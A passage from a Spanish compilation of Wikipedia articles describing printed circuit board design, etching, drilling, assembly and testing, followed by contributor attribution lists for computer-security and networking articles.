Circuito impreso de los pines de un dispositivo, usualmente con la distribucin de los pad y perforaciones recomendadas. La biblioteca permite que los footprint sean dibujados slo una vez, y luego compartidos por todos los dispositivos de ese tipo. En algunos sistemas, los pads de alta corriente son identificados en la biblioteca de dispositivos, y los nodos asociados son etiquetados para llamar la atencin del diseador del circuito impreso. Las corrientes elevadas requieren de pistas ms anchas, y el diseador usualmente determina este ancho. Luego el programa combina la lista de nodos (ordenada por el nombre de los pines) con la lista de pines (ordenada por el nombre de cada uno de los pines), transfiriendo las coordenas fsicas de la lista de pines a la lista de nodos. La lista de nodos es luego reordenada, por el nombre del nodo. Algunos sistemas pueden optimizar el diseo al intercambiar la posicin de las partes y compuertas lgicas para reducir el largo de las pistas de cobre. Algunos sistemas tambin detectan automticamente los pines de alimentacin de los dispositivos, y generan pistas o vas al plano de alimentacin o conductor ms cercano. Luego el programa trata de rutear cada nodo en la lista de seales-pines, encontrando secuencias de conexin en las capas disponibles. A menudo algunas capas son asignadas a la alimentacin y a la tierra, y se conocen como plano de alimentacin y tierra respectivamente. Estos planos ayudan a blindar los circuitos del ruido. El problema de ruteo es equivalente al problema del vendedor viajero, y es por lo tanto NP-completo, y no se presta para una solucin perfecta. Un algoritmo prctico de ruteo es elegir el pin ms lejano del centro de la tarjeta, y luego usar un algoritmo codicioso para seleccionar el siguiente pin ms cercano con la seal del mismo nombre. Despus del ruteo automtico, usualmente hay una lista de nodos que deben ser ruteados manualmente. Una vez ruteado, el sistema puede tener un conjunto de estrategias para reducir el costo de produccin del circuito impreso. Por ejemplo, una rutina podra suprimir las vas innecesarias (cada va es una perforacin, que cuesta dinero). Otras podran redondear los bordes de las pistas, y ensanchar o mover las pistas para mantener el espacio entre stas dentro de un margen seguro. Otra estrategia podra ser ajustar grandes reas de cobre de tal forma que ellas formen nodos, o juntar reas vacas en reas de cobre. Esto permite reducir la contaminacin de los productos qumicos utilizados durante el grabado y acelerar la velocidad de produccin. Algunos sistemas tienen comprobacin de reglas de diseo para validar la conectividad elctrica y separacin entre las distintas partes, compatibilidad electromagntica, reglas para la manufactura, ensamblaje y prueba de las tarjetas, flujo de calor y otro tipo de errores. La serigrafa, mscara antisoldante y plantilla para la pasta de soldar, a menudo se disean como capas auxiliares.

135

Manufactura
Patrones
La gran mayora de las tarjetas para circuitos impresos se hacen adhiriendo una capa de cobre sobre todo el sustrato, a veces en ambos lados (creando un circuito impreso virgen), y luego retirando el cobre no deseado despus de aplicar una mscara temporal (por ejemplo, grabndola con percloruro frrico), dejando slo las pistas de cobre deseado. Algunos pocos circuitos impresos son fabricados al agregar las pistas al sustrato, a travs de un proceso complejo de electrorecubrimiento mltiple. Algunos circuitos

A la izquierda la imagen de la PCB diseada por ordenador y a la derecha la PCB manufacturada y montada.

Circuito impreso impresos tienen capas con pistas en el interior de ste, y son llamados cicuitos impresos multicapas. stos son formados al aglomerar tarjetas delgadas que son procesadas en forma separada. Despus de que la tarjeta ha sido fabricada, los componentes electrnicos se sueldan a la tarjeta.

136

Mtodos tpicos para la produccin de circuitos impresos


1. La impresin serigrfica utiliza tintas resistentes al grabado para proteger la capa de cobre. Los grabados posteriores retiran el cobre no deseado. Alternativamente, la tinta puede ser conductiva, y se imprime en una tarjeta virgen no conductiva. Esta ltima tcnica tambin se utiliza en la fabricacin de circuitos hbridos. 2. El fotograbado utiliza una fotomecnica y grabado qumico para eliminar la capa de cobre del sustrato. La fotomecnica usualmete se prepara con un fotoplotter, a partir de los datos producidos por un programa para el diseo de circuitos impresos. Algunas veces se utilizan transparencias impresas en una impresora Lser como fotoherramientas de baja resolucin. 3. El fresado de circuitos impresos utiliza una fresa mecnica de 2 o 3 ejes para quitar el cobre del sustrato. Una fresa para circuitos impresos funciona en forma similar a un plotter, recibiendo comandos desde un programa que controla el cabezal de la fresa los ejes x, y y z. Los datos para controlar la mquina son generados por el programa de diseo, y son almacenados en un archivo en formato HPGL o Gerber. 4. La impresin en material termosensible para transferir a travs de calor a la placa de cobre. En algunos sitios comentan de uso de papel glossy (fotogrfico), y en otros de uso de papel con cera como los papeles en los que vienen los autoadesivos. Tanto el recubrimiento con tinta, como el fotograbado requieren de un proceso de atacado qumico, en el cual el cobre excedente es eliminado, quedando nicamente el patrn deseado.

Atacado
El atacado de la placa virgen se puede realizar de diferentes maneras. La mayora de los procesos utilizan cidos o corrosivos para eliminar el cobre excedente. Existen mtodos de galvanoplastia que funcionan de manera rpida, pero con el inconveniente de que es necesario atacar al cido la placa despus del galvanizado, ya que no se elimina todo el cobre. Los qumicos ms utilizados son el cloruro frrico, el sulfuro de amonio, el cido clorhdrico mezclado con agua y perxido de hidrgeno. Existen formulaciones de ataque de tipo alcalino y de tipo cido. Segn el tipo de circuito a fabricar, se considera ms conveniente un tipo de formulacin u otro. Para la fabricacin industrial de circuitos impresos es conveniente utilizar mquinas con transporte de rodillos y cmaras de aspersin de los lquidos de ataque, que cuentan con control de temperatura, de control de presin y de velocidad de transporte. Tambin es necesario que cuenten con extraccin y lavado de gases.

Perforado
Las perforaciones, o vas, del circuito impreso se taladran con pequeas brocas hechas de carburo tungsteno. El perforado es realizado por maquinaria automatizada, controlada por una cinta de perforaciones o archivo de perforaciones. Estos archivos generados por computador son tambin llamados taladros controlados por computador (NCD por sus siglas en ingls) o archivos Excellon. El archivo de perforaciones describe la posicin y tamao de cada perforacin taladrada. Cuando se requieren vas muy pequeas, taladrar con brocas es costoso, debido a la alta tasa de uso y fragilidad de stas. En estos casos, las vas pueden ser evaporadas por un lser. Las vas perforadas de esta forma usualmente tienen una terminacin de menor calidad al interior del orificio. Estas perforaciones se llaman micro vas. Tambin es posible, a travs de taladrado con control de profundidad, perforado lser, o pre-taladrando las lminas individuales antes de la laminacin, producir perforaciones que conectan slo algunas de las capas de cobre, en vez

Circuito impreso de atravesar la tarjeta completa. Estas perforaciones se llaman vas ciegas cuando conectan una capa interna con una de las capas exteriores, o vas enterradas cuando conectan dos capas internas. Las paredes de los orificios, para tarjetas con dos o ms capas, son metalizadas con cobre para formar, orificios metalizados, que conectan elctricamente las capas conductoras del circuito impreso.

137

Estaado y mscara antisoldante


Los pads y superficies en las cuales se montarn los componentes, usualmente se metalizan, ya que el cobre al desnudo no es soldable fcilmente. Tradicionalmente, todo el cobre expuesto era metalizado con soldadura. Esta soldadura sola ser una aleacin de plomo-estao, sin embargo, se estn utilizando nuevos compuestos para cumplir con la directiva RoHS de la UE, la cual restringe el uso de plomo. Los conectores de borde, que se hacen en los lados de las tarjetas, a menudo se metalizan con oro. El metalizado con oro a veces se hace en la tarjeta completa. Las reas que no deben ser soldadas pueden ser recubiertas con un polmero resistente a la soldadura, el cual evita cortocircuitos entre los pines adyacentes de un componente.

Serigrafa
Los dibujos y texto se pueden imprimir en las superficies exteriores de un circuito impreso a travs de la serigrafa. Cuando el espacio lo permite, el texto de la serigrafa puede indicar los nombres de los componentes, la configuracin de los interruptores, puntos de prueba, y otras caractersticas tiles en el ensamblaje, prueba y servicio de la tarjeta. Tambin puede imprimirse a travs de tecnologa de impresin digital por chorro de tinta (inkjet/Printar) y volcar informacin variable sobre el circuito (serializacin, cdigos de barra, informacin de trazabilidad).

Montaje
En las tarjetas through hole (a travs del orificio), los pines de los componentes se insertan en los orificios, y son fijadas elctrica y mecnicamente a la tarjeta con soldadura. Con la tecnologa de montaje superficial, los componentes se sueldan a los pads en las capas exteriores de la tarjetas. A menudo esta tecnologa se combina con componentes through hole, debido a que algunos componentes estn disponibles slo en un formato.

Pruebas y verificacin
Las tarjetas sin componentes pueden ser sometidas a pruebas al desnudo, donde se verifica cada conexin definida en el netlist en la tarjeta finalizada. Para facilitar las pruebas en producciones de volmenes grandes, se usa una Cama de pinchos para hacer contacto con las reas de cobre u orificios en uno o ambos lados de la tarjeta. Un computador le indica a la unidad de pruebas elctricas, que enve una pequea corriente elctrica a travs de cada contacto de la cama de pinchos, y que verifique que esta corriente se reciba en el otro extremo del contacto. Para volmenes medianos o pequeos, se utilizan unidades de prueba con un cabezal volante que hace contacto con las pistas de cobre y los orificios para verificar la conectividad de la placa verificada.

Proteccin y paquete
Los circuitos impresos que se utilizan en ambientes extremos, usualmente tienen un recubrimiento, el cual se aplica sumergiendo la tarjeta o a travs de un aerosol, despus de que los componentes han sido soldados. El recubrimiento previene la corrosin y las corrientes de fuga o cortocircuitos producto de la condensacin. Los primeros recubrimientos utilizados eran ceras. Los recubrimientos modernos estn constituidos por soluciones de goma silicosa, poliuretano, acrlico o resina epxica. Algunos son plsticos aplicados en una cmara al vaco.

Circuito impreso

138

Tecnologa de montaje superficial


La tecnologa de montaje superficial fue desarrollada en la dcada de 1960, gan impulso en Japn en la dcada de 1980, y se hizo popular en todo el mundo a mediados de la dcada de 1990. Los componentes fueron mecnicamente rediseados para tener pequeas pestaas metlicas que podan ser soldadas directamente a la superficie de los circuitos impresos. Los componentes se hicieron mucho ms pequeos, y el uso de componentes en ambos lados de las tarjetas se hizo mucho ms comn, permitiendo una densidad de componentes mucho mayor. El montaje superficial o de superficie se presta para un alto grado de automatizacin, reduciendo el costo en mano de obra y aumentando las tasas de produccin. Estos dispositivos pueden reducir su tamao entre una cuarta a una dcima parte, y su costo entre la mitad y la cuarta parte, comparado con componentes through hole

Listado de maquinas industriales que intervienen en la fabricacin de PCB


1. 2. 3. 4. Perforadoras de control numrico con cambio automtico de mechas Perforadora de control numrico 6 de 4 cabezales Laminadora Iluminadora de 2 x 1000W de una bandeja doble faz

5. Iluminadora 60/75 de 2 x 5000W de doble bandeja doble faz 6. Reveladora de fotopolmeros de 4 cmaras 7. Desplacadora de fotopolmeros de 4 cmaras 8. Grabadora amoniacal de 2 cmaras + doble enjuague 9. Grabadora amoniacal 10. Impresoras serigrficas semiautomticas 11. Impresora 12. Pulidoras simple 13. Pulidora 14. Fotoploter de pelcula continua de triple rayo lser 15. Reveladora continua de pelculas fotogrficas 16. Router de control numrico de 1 cabezal de capacidad de 600 x 600 mm 17. Perforadora / apinadora de doble cabezal 18. Compresores de pistn seco de 10 HP 19. Compresor de tornillo de 30 HP 20. Guillotina 21. Hornos de secado 22. Afiladora de mechas de vidia de 6 piedras 23. Mquina de V-scoring 24. Reveladora con 2 cmaras de enjuague 25. Mquina Bonding de cuatro cabezales

Circuito impreso

139

Programas para el diseo de circuitos impresos


OrCAD Proteus kicad Altium Livewire PCBWiz DesignSpark PCB

Notas y referencias Enlaces externos


Construccin de una plaqueta de circuito Impreso (http://concifederico.blogspot.com/2012/10/ construccion-de-una-plaqueta-pcb.html) - Gua con detalles para mejorar la calidad constructiva de los circuitos impresos. Cmo fabricar circuitos impresos (http://www.circuitoselectronicos.org/2010/08/ como-fabricar-circuitos-impresos-metodo.html) - Cmo hacer fcilmente circuitos impresos. Tutoriales en Robotic-Lab (http://www.robotic-lab.com/blog/tutoriales/como-fabricar-circuitos-impresos/) Como hacer de forma casera y econmica circuitos impresos Como fabricar tus propios PCB (http://www.ucontrol.com.ar/wiki/index. php?title=Como_construir_tus_propios_PCB) - Un tutorial paso a paso con fotografas sobre como construir circuitos impresos en casa Calculadoras de la impedancia del PCB (http://www.sunmantechnology.com/resources_ec.html) Calculadoras de la impedancia (en ingls)

Fuentes y contribuyentes del artculo

140

Fuentes y contribuyentes del artculo


Virus informtico Fuente: http://es.wikipedia.org/w/index.php?oldid=65551505 Contribuyentes: .Sergio, Abgenis, Airunp, Airwolf, Alejandra 55, Alejandroml, Alex music24, Alexav8, Alexistorrez, Alfa989, Alhen, Aloriel, Alvarittox, Amads, Ana isabel montufar, AngelsCry, Antur, Arhendt, Arrt-932, Ascnder, AstroF7, BL, BRiemann, Baiji, Balboa13, Beto29, BetoCG, BlackBeast, Blacki4, Bostok I, Brion VIBBER, Cacatua777, Camilo, Camima, Carolchin, CesarWoopi, Chapapapa, Cheu, Chuck es dios, Cinabrium, Comae, CommonsDelinker, Cratn, Cronos x, Ctrl Z, Dangarcia, David0811, Death Master, Dermot, Diamondland, Diegusjaimes, Dreitmen, EGFerreiro, Edmenb, Eduardosalg, Edub, Edupedro, Egaida, Ejmeza, ElPiedra, Elabra sanchez, Elhorrego, Elisardojm, Ellinik, Emijrp, Ente X, Er Komandante, Erick dm, FACCE, FAR, Fanattiq, Fdelrio89, FedericoF, Felipewiki, Fernando Estel, Ferrari 707, Filipo, Fmariluis, FrancoGG, Frango com Nata, Fravia, Furrykef, Gabriel-rocksarino, Gafotas, General Pico, GermanX, Germo, Greek, Gurgut, Gusgus, Gustronico, HECTOR ARTURO AZUZ SANCHEZ, HUB, Hack-Master, House, Humberto, Icvav, Internetsinacoso, Interwiki, Isha, JMPerez, JOKblogger, Jacorream, Jakeukalane, Jareyes, Jarisleif, Javierdekai, Jondel, JorgeGG, Joseaperez, Josemanib, Juanfran GG, Juli 2007, Jusaheco, K312W1N, Kaninchen, Kekkyojin, Kender00, Kirtash, Kizar, KnightRider, Kved, La Corona, Libero, Linfocito B, Lucien leGrey, LuisArmandoRasteletti, Luiswtc73, LyingB, M303, MATADOR-Z, Macar, Mafores, Magister Mathematicae, Mahadeva, Maldoror, Maleiva, Mamosi, Mansoncc, ManuP, Manuelt15, Manw, Marcmasmiquel, Marco94, MarcoAurelio, Markoszarrate, Markps96, Matdrodes, Matiash93, Mel 23, Millars, Monicagorzy, Montehermoso-spain, Montgomery, Moriel, Mstreet linux, Muro de Aguas, Murphy era un optimista, Mximo de Montemar, N4D13, Nara Shikamaru, Nemo, Netito777, Numenor 90, Ornitododo, Ortisa, Oscar ., Pabloallo, Pan con queso, Petronas, Phyrokarma, Pilaf, Pinar, Pincho76, Pitototote, Platonides, Plux, Queninosta, Quesada, Qwertyytrewqqwerty, RETEGA, Rafa3040, Rastrojo, Raystorm, Rebanvi, Reidrac, Richy, Rmarmolejor, Roberto Fiadone, RoyFocker, Rrmsjp, STARPLAYER, Sabbut, Sanbec, Santiperez, Satin, Sebastiano, Serail, Sergio Andres Segovia, Sigmanexus6, Sking, Smrolando, Snakeyes, Spirit-Black-Wikipedista, SuperBraulio13, Superzerocool, Taichi, Tano4595, Timmy turner123, Tinom 94, Tirithel, Tomatejc, Tophia, TorQue Astur, Tortillovsky, Triku, Tuxisuau, Txuspe, Ty25, Ucevista, VR0, VanKleinen, Varano, Veon, Vic Fede, Victormoz, Vitamine, Voiceterms, Will vm, Winjaime, XalD, Yaneli'm, Yeza, Zanaqo, ZrzlKing, conversion script, 929 ediciones annimas ILoveYou Fuente: http://es.wikipedia.org/w/index.php?oldid=66525222 Contribuyentes: Alexav8, BludgerPan, Carmin, Cordwainer, Dreitmen, Ezarate, Humberto, Jkbw, Kizar, Mel 23, Miss Manzana, NoditaPony, PMndezor, Rastrojo, SuperBraulio13, Urbanuntillll, XalD, 37 ediciones annimas Distribucin Linux Fuente: http://es.wikipedia.org/w/index.php?oldid=67359534 Contribuyentes: -jem-, .Sergio, 1c6180, 4lex, Abor, Acratta, Afrox, Alberto Maria, AlbertoDV, AlexAlonso, Alexis PM, Allentiak, Aloriel, Antoine, Antoniogartime ule, Antur, Arstides Herrera Cuntti, Ascnder, Bartoloco, Canariocio, Carazo, Carolingio93, Cidtux, Cinabrium, Clbt, ColdWind, Colossus3000, DZPM, Dangarcia, Darolu, Davis150, Daycart, Definixertivm, Deivis, Dhidalgo, Digigalos, Dodo, Donmatas, Doreano, Dummydanger, Ebrainte, Eduardobora, Eduardosalg, Edub, Edupedro, Efremigio, El Pantera, Emijrp, Enriquemc, Er Komandante, Escarlati, Escornaboi, FADG, Federicotg, Felipealvarez, Fitoschido, Francisco Sosa Romero, FrancoGG, Fzf, Gabriel Acquistapace, Gacq, GermanX, Gotencool, Gronky, Gtz, Hack-Master, Hanjin, Helmy oved, Hispa, Hprmedina, Humbefa, Iacaca, Interwiki, JOPARA, Jakeukalane, Jap99, Jcentel, Jfranco, Jjvaca, JoRgE-1987, Josemiguel93, Jotapesan, Jsanchezes, JuanPaBJ16, Juanpellicer, K-F.U.N 2, Kerberosdelhades, Kirdux, Klaus 15, KnightRider, Lasarux, Lermit, Leugim1972, Linfocito B, Lucien leGrey, LyingB, M4TYA5, Mablanco, Madek, Maesitos, ManoloKosh, Mansoncc, ManuelGR, Mapalma, MarcosManoni, Mark83, Martnhache, Matdrodes, Mauricio.Andres.Gles, Maximilinux, Mescalier, Mortadelo2005, Mstreet linux, Neodraco, Nicolasfrutos, Nihilo, Nikai, Omerta-Ve, Orgullomoore, Periku, Petronas, Pumuki, Plux, Quiron, Raidentk, Ralgis, Ramjar, Ratatouille18, Rbidegain, Reidatov, Rholguinc, Ricardogpn, Ricochetmex, RoyFocker, Rpm, Rsg, Rubpe19, Rudial, SF007, Sabbut, Salvatore.trimarchi, Shooke, Since, Snakefang, Speedguitardemon, SuperBraulio13, Surfaz, Tafol, Technopat, Thussar, Tonny logicc, Truor, Tuxedoar, VARGUX, Valenluis, Vdifiore, Venturi, Vitamine, Wedrey, X.Cyclop, Xihh, Xosema, Xuankar, Yakoo, Yoansierra, Yrithinnd, ZeRobLaCk, Zelkova, 448 ediciones annimas Servidor Fuente: http://es.wikipedia.org/w/index.php?oldid=67079873 Contribuyentes: -jem-, .roman.., 4lex, 80.35.47.xxx, Abece, Aeveraal, AlexGPL, Alhen, Altoloco, Andre Engels, Ascnder, Barcex, Biasoli, Billinghurst, BuenaGente, Cancervero1024, Caos, Carmin, ColdWind, Comae, CommonsDelinker, Cronos x, Developer, Diegusjaimes, Dodo, Edelete, Edslov, Ejbogantes, Ejrrjs, Emijrp, Equi, FAR, Farcu9119, Farisori, FedericoMP, FrancoGG, Frigotoni, Furti, Gabyjac, Gacq, GermanX, HECTOR ARTURO AZUZ SANCHEZ, Halfdrag, Helmy oved, Humanware, Humberto, Igna, Interwiki, J. A. Glvez, Jacksonh, Jcfidy, Jesuja, Jkbw, Jsanchezes, Jugones55, Kamo64, Kjgomez, Lasneyx, Laura Fiorucci, Lordlirych, Ludeir, Mac, Magister Mathematicae, Mansoncc, ManuelGR, Maquedasahag, Markoszarrate, Matdrodes, Moiwiki, Moriel, Mortadelo2005, Moscar, Netito777, New traffic pattern, Ninovolador, Nuncaeterno, OMenda, Osado, PetrohsW, Pit, Poco a poco, Plux, Ralgis, Raul Medina, Ricardo Moctezuma, Rondador, Rosarino, Rsg, Rge, SPZ, Santiago Martn, Savh, Sergio Andres Segovia, Shooke, SirSlither, Sonoriuxo, SuperBraulio13, Superzerocool, Syrus, Tano4595, Technopat, Tei, TeleMania, Thedown, Tirithel, UA31, Veltys, Vesm, Victor0808, Walterzum, Wikilptico, Zeist Antilles, Zokeber, conversion script, proxy1.unizar.es, ngel Luis Alfaro, 298 ediciones annimas Ingeniera social (seguridad informtica) Fuente: http://es.wikipedia.org/w/index.php?oldid=67196864 Contribuyentes: 2rombos, AchedDamiman, Aeris, Alakasam, Alexav8, AndreaAlvarez2012, CF, Damianiencowiki, Diogeneselcinico42, Ekz4, Endo, Fernd, FingolRicks, Furado, Gabriel Acquistapace, GermanX, Jorge c2010, Jorgechp, LauraFarina, Lbmartinez, Leandro Palacios, Lnegro, Luiscastellanos, LyingB, Matdrodes, Pedro Nonualco, Platonides, Plux, Shalbat, Spa karmona, TXiKi, Technopat, Tony Rotondas, UAwiki, Woyzeck, 69 ediciones annimas Blaster Fuente: http://es.wikipedia.org/w/index.php?oldid=64735306 Contribuyentes: Aelo, Alexav8, Alvaro qc, Beto29, Boja, Camilo, Corbachini33, DamianFinol, Er Komandante, Espilas, Humberto, Inteco, Jarke, Julio Augusto, Kizar, Papix, Ricardogpn, Sergio Andres Segovia, Timmy turner123, Vitamine, 57 ediciones annimas Ataque de denegacin de servicio Fuente: http://es.wikipedia.org/w/index.php?oldid=66990666 Contribuyentes: Albertojuanse, Alemazurk Mayo, AlexGPL, Alexisabarca, Aloriel, Antojio, Antur, Aipni-Lovrij, Barri, Chiquix, Cinabrium, DMG, Daniel G., Dav7mx, Diegusjaimes, Dodo, Dorieo, Ejmeza, Emijrp, Enrichh, Er Komandante, Feministo, Gallowolf, GermanX, Ghostbar, Hernando Gamezvar, Huds, ILoveSugar, Jakeukalane, Jjvaca, Jkbw, Jugones55, Kekkyojin, Kizar, Laura Fiorucci, Leandrosw, Linux65, Manuelt15, Montgomery, Mortadelo, Nelsito777, NonimoHack, Orgullomoore, Paintman, RICARDOSA, Ralgis, Rastrojo, Rizome, Rllaque, Sans-Serif, Smoken Flames, Snak1116, Superzerocool, Surfaz, Technopat, Vicper, X.Cyclop, Yilku1, 153 ediciones annimas Ping de la muerte Fuente: http://es.wikipedia.org/w/index.php?oldid=64945754 Contribuyentes: BlackBeast, Dalacost, Diegusjaimes, Digigalos, GermanX, Herresuelo, Individuo7, JMorchio, Jjvaca, Josemajosema, Kizar, Paintman, Poc-oban, Savh, Sellkyrck, Sergio Andres Segovia, Vivaelcelta, William1509, Xoneca, 31 ediciones annimas Anonymous Fuente: http://es.wikipedia.org/w/index.php?oldid=67287551 Contribuyentes: 99gogeta, Abece, Adri--93, Albert1805, Alejandrocaro35, Aleuze, Amads, Aner77, Anonymo12, AnselmiJuan, Anviatella, ArgosPerroDeOdiseo, Aswarp, Atila rey, Augusto664, Belb, BetoCG, BlouBlou, Boina01, Boogie, Bryanpvz, Buscador123, CHUCAO, Caso1, Cheveri, Ciberprofe, Cirt, Contulmo, Correogsk, Dagane, Daniyyel, Dark-Jav, Depekes, Dhidalgo, Dorieo, Dossier2, Duvan Andres 25, EMCpictures, Editor123, Eliavp, Elimedina, Elkingkapo, Emiduronte, Entalpia2, Escarlati, Fadesga, Fercufer, Ferrari-99, Festor, GM83, Gallowolf, Gelpgim22, Gilc, Glyniss, Grillitus, ILoveSugar, Igna, Ileana n, Imperator-Kaiser, Inuyasha1111, JESSIP, JMCC1, JOSEVI3232, Jcaraballo, Jkbw, Jorge 2701, Julianortega, Killmasterfromspain, Kizar, Kof1500, Laura Fiorucci, Leiro & Law, LocoWiki, LordT, M.heda, MadriCR, Magister Mathematicae, Makeiro, Manolin160, Mapep, Mar del Sur, Martely, Mathonius, MaurOS X, Metrnomo, MiguelSinAlma, Molibdeno42, Montgomery, Na vanya, Nash0h, Neropock, Netito777, Ninrouter, OboeCrack, Petronas, Piuka, Pla y Grande Covin, Plux, Ralgis, Rastrojo, Reynaldo Villegas Pea, Rock xyz 666, Rosarino, Ruberyuka, Sabbut, Sageo, Saloca, Savh, Sebrev, Sergio Andres Segovia, Srbanana, Steiber, Torrenteforever, VashTheStampede, Waka Waka, Warko, ZEN ic, Zoram.hakaan, Zulucho, ngel Luis Alfaro, 288 ediciones annimas Nuke Fuente: http://es.wikipedia.org/w/index.php?oldid=66992158 Contribuyentes: BetoCG, Iacobushumilis, Kostellus, Rizome, Tomatejc, 2 ediciones annimas Flags Fuente: http://es.wikipedia.org/w/index.php?oldid=62887771 Contribuyentes: Bahamunt, Barri, Marcelo8776, Pipandro, Waeswaes Ataque smurf Fuente: http://es.wikipedia.org/w/index.php?oldid=64612675 Contribuyentes: DJ Nietzsche, GermanX, Jfwiki, Kizar, Lalbertme, Leandrosw, Paintman, Rufflos, Tano4595, Ysidoro, 11 ediciones annimas Antivirus Fuente: http://es.wikipedia.org/w/index.php?oldid=67450783 Contribuyentes: -ecarv-, -jem-, 2rombos, 3coma14, 9javivi, AITDIV, Abgenis, AchedDamiman, Airunp, Al59, Alavisan, Aleposta, Alexan, Alexlp182, Alvaro qc, Andreasmperu, Angel GN, Anma12345678910, Anrfernandez, Antur, Ap0st0L, ArSk8, Argenis86, Aristarco de Samotracia, Asael31, Asqueladd, Aipni-Lovrij, Baiji, Banfield, Barcex, Baute2010, Beesocialmx, Beta15, BetoCG, BlackBeast, BuenaGente, Bulimaster, Camilo, Canopus49, Canopus49Puppet, Carlos e64, Carmin, Carutsu, Cesarth15, Charlie Wiki, Chico512, Ciencia Al Poder, Cipin, Claudiameme, Corydora, Cratn, Creosota, Cris7593, Daimond, Dangelin5, Dartozitho, Diego1105, Diegusjaimes, Dmlambea, Dragonager, Dx4, EL NEGRO FERIA, Ec uv, Edmenb, Eduardosalg, Edub, El loko, Elabra sanchez, Elgrandezon, Elisardojm, Ellinik, Elmejoramigodelhombre, Elsenyor, Emiduronte, Emijrp, Ensada, Estefania avila, Ezarate, FAR, FFD, FedericoMP, Ferbr1, Filipo, Firewalldefender, Folkvanger, Foundling, Foxinlee, FrancoGG, Gabi turretoh, Gacelo, Gacq, Gaijin, Gaius iulius caesar, Ganmedes, GermanX, Gothmog, Grizzly Sigma, Gsrdzl, Guadalupe Emmanuel, HECTOR ARTURO AZUZ SANCHEZ, HUB, Hack-Master, Hectordanielopez, Helmy oved, Hprmedina, Humberto, Ialad, Ignacios, Isha, J. A. Glvez, JMPerez, Jabov5, Javiergtareveron, Javierito92, Jcaraballo, Jjmama, Jkbw, Jmvgpartner, Jonadad, JorgeGG, Jorgechp, Joseaperez, Jprm, Jsanchezes, Judioxx, Julian leonardo paez, Jxvierrm, Khattab01, KnightRider, Kved, Latinoyargentino, Laura Fiorucci, Leonpolanco, Libero, Lifnob, Linfocito B, Lissitax, LordNes, Lourdes Cardenal, LyingB, Lzaro, Mafores, Magister Mathematicae, Mahadeva, Manw, Marcelo, MarcoAurelio, Margueniz, Matdrodes, Mel 23, MercurioMT, Misi91, MotherForker, Mpeinadopa, Mr.Ajedrez, Mrexcel, Mrtn z, Muro de Aguas, Mushii, Mutari, NaSz, Natrix, Netito777, Nixn, Nubecosmica, OboeCrack, Orcaj001, Orlandodj, Ortisa, Oscar ., PAULOGARCIA2005, Pacostein, Painandloveaxl, Palica, Pan con queso, Panda Madrid, Perman, Peter Griffin, Petruss, Platonides, Porao, Plux, Queninosta, Qwertyytrewqqwerty, RAMDOM X, Racso, Ralgis, Raulshc, Recuperamosdatos, Retama, Ricardogpn, Ricardovo, Roberpl, Rockerorocky, Rodrigofeu, RoyFocker, Rubpe19, Rge, STARPLAYER, Santiperez, Satin, Savh, Sebasgnokrbipahbdfg, Sergio Mendez Galindo, Sermed, SeorDarcy, Si brigith jaja, Siabef, Simen el Loco, Skywalker309, Soruz, SuperBraulio13, Superzerocool, Taichi, Tano4595, Technopat, The worst user, Tirithel, Tonchizerodos, Tostadora, Troels Nybo, UA31, Vacarreno, Vatelys, Veon, Vitamine, Vubo, Wedrey, Will vm, Xexito, Yeza, Zanaqo, Zeytin, 1183 ediciones annimas

Fuentes y contribuyentes del artculo


Ciencias de la computacin Fuente: http://es.wikipedia.org/w/index.php?oldid=67423168 Contribuyentes: -jem-, 217-126-150-34.uc.nombres.ttd.es, Acratta, Agviquez86, AldanaN, Aledesanfer95, AlfonsoERomero, Andreasmperu, AndyVec, Antonorsi, Antn Francho, Apaz, Aquila ltda, Balderai, Brainup, Cedecomsa, Chester269, Chien, Cmonzonc, Comae, Cookie, Correogsk, Cratn, Cristianrock2, DIANA ALCANTARA, Damian cf, Davidzodelin, Death Master, Diegusjaimes, Djblack!, Dromero, EL Willy, Edc.Edc, Eduardosalg, Edulix, El loko, Emiduronte, Er Komandante, Ezarate, Farisori, Francisco2289, Furti, Greek, Greenbreen, HIPATIA2006, Helmy oved, Hidoy kukyo, Isha, JMCC1, Janus, Jarlaxle, Jefrcast, Jesuja, Jim88Argentina, Jkbw, Jose Aragon, Jstitch, Jtico, Juan.res, Kelden, Kn, Kulos, Kved, LMLM, Lapaxangacity, Lautaroo, Leonpolanco, Leugim1972, Mafores, ManuelGR, Marcoantoniothomas, Matdrodes, Maury11rock, Maveric149, McMalamute, Mdd, MercurioMT, Miguelo on the road, Muro de Aguas, Natalia Villarroel, Netito777, Ortisa, Paintman, Pedro Nonualco, Pinar, Poco a poco, Plux, Rafael.heras, Rastrojo, Ravotm, Rodrigouf, RonaldoExtreme, Ruy Pugliesi, Rge, Sabbut, Seasz, Sergio Andres Segovia, Slastic, Smileegar, Sosqartxa, SuperBraulio13, Surekilt, Tano4595, Taragui, Technopat, Thorongil, Tirithel, Trylks, UA31, Vitamine, Vubo, Walter closser, Xavier, Youssefsan, conversion script, l, 327 ediciones annimas Cortafuegos (informtica) Fuente: http://es.wikipedia.org/w/index.php?oldid=67444506 Contribuyentes: AchedDamiman, Airunp, Albertocalzones, Alejobd, Alexav8, Alhassam, Angus, Antonio Lopez, Antn Francho, Any Rand, Ascnder, Axvolution, Axxgreazz, Barcex, Barri, Bethan 182, Biasoli, Billinghurst, Bucephala, Caiser, Caos, Carlos Humberto, Ciencia Al Poder, Cobalttempest, Cookie, Correogsk, Cristianrock2, Cybermaniac, Danem, Dani vk2, Danilo Andres Ramirez, David.Villa, Deoxys 94, Dianai, Diegusjaimes, Digigalos, Dodo, Donpipo, Ecemaml, Edub, Er Komandante, Fernando Estel, Firewall, Fmariluis, Foundling, FrozenFlame, Gcsantiago, GermanX, Gins90, Googolplanck, Hacko2, Halfdrag, Helmy oved, Hiperfelix, Humberto, Ingteleco, Internetsinacoso, Interwiki, Irbian, Ismagm, J. A. Glvez, Jkbw, Jmvkrecords, Jondel, Jorge c2010, JorgeGG, Jotego, LMLM, LadyInGrey, Laura Fiorucci, Leiro & Law, Leonpolanco, Lourdes Cardenal, Lucien leGrey, Luispore, Malkavian, Mansoncc, ManuelGR, Manuelt15, Marco Regueira, Matdrodes, MatiasBellone, Mced, Miguelcorsi, Nachosan, Natrix, Niqueco, Ortisa, Osado, Paporrubio, PedroPrograma500, Platonides, Poco a poco, Plux, Queninosta, Quiliro, Ralgis, Raulshc, Reinam, Roberpl, Rodri cyberdog, Roithamer, Rosita fraguel, Rubpe19, Ruiz-mazon, Santiperez, Sauron, Serolillo, SuperBraulio13, Superzerocool, Technopat, Tirithel, Tostadora, UA31, Valdega, Vbarahona, Veloma, Vivaelcelta, Welteroel, 444 ediciones annimas Bastion host 